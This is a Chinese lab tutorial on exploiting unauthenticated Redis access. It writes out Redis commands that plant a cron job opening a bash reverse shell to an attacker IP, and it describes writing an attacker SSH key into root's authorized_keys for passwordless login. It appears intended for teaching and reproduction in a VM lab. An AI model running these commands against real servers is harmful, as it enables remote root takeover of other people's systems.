redis未授权访问漏洞

redis未授权访问漏洞的成因和危害

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

漏洞的验证以及演示过程

在这里插入图片描述

在这里插入图片描述

漏洞的验证以及利用过程

在这里插入图片描述
config set dir /var/spool/cron
设置写入的目录,此目录为linux存放本地任务计划的目录

config set dbfilename root
设置写入的文件名

set aabb "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.247.130/1234 0>&1\n\n"
设置写入的内容,反向连接192.168.247.130的1234端口

redis安装过程

相关文章

我这里是在VMware中弄了一个centos7和一个kali来进行实验复现

centos7已经运行redis

在这里插入图片描述
kali这边也安装了redis

在这里插入图片描述
通信也是正常的,防火墙也关闭了

在这里插入图片描述
攻击机kali通过无密码连接成功

在这里插入图片描述
执行info,执行成功,可以利用

在这里插入图片描述
设置写入文件的路径(linux启动项),以及文件名

在这里插入图片描述
kali开启nc监听

在这里插入图片描述
这里收到了会话,查看任务计划,反弹shell成功

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

通过shell在对方root目录下创建一个隐藏文件夹

(若是目标使用过ssh服务,则会自动生成/root/.ssh文件目录,若使用过就通过任务计划反弹的shell创建)

在这里插入图片描述

清空黑客机本机root下的.ssh文件的内容,如果没有.ssh文件则在黑客机本机的root目录下创建.ssh文件

在这里插入图片描述

进入.ssh文件通过命令ssh-keygen -t rsa在本地生成公钥对
id_rsa为私钥,id_rsa.pub为公钥

在这里插入图片描述
在这里插入图片描述

将公钥写入txt文件

在这里插入图片描述

将公钥中的内容作为值写入到hack中,写入redis

在这里插入图片描述
更改redis备份路径为ssh公钥存放的目录,(一般默认为/root/.ssh),生成authorized_keys文件

在这里插入图片描述
在黑客机免密登录目标机

在这里插入图片描述

在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值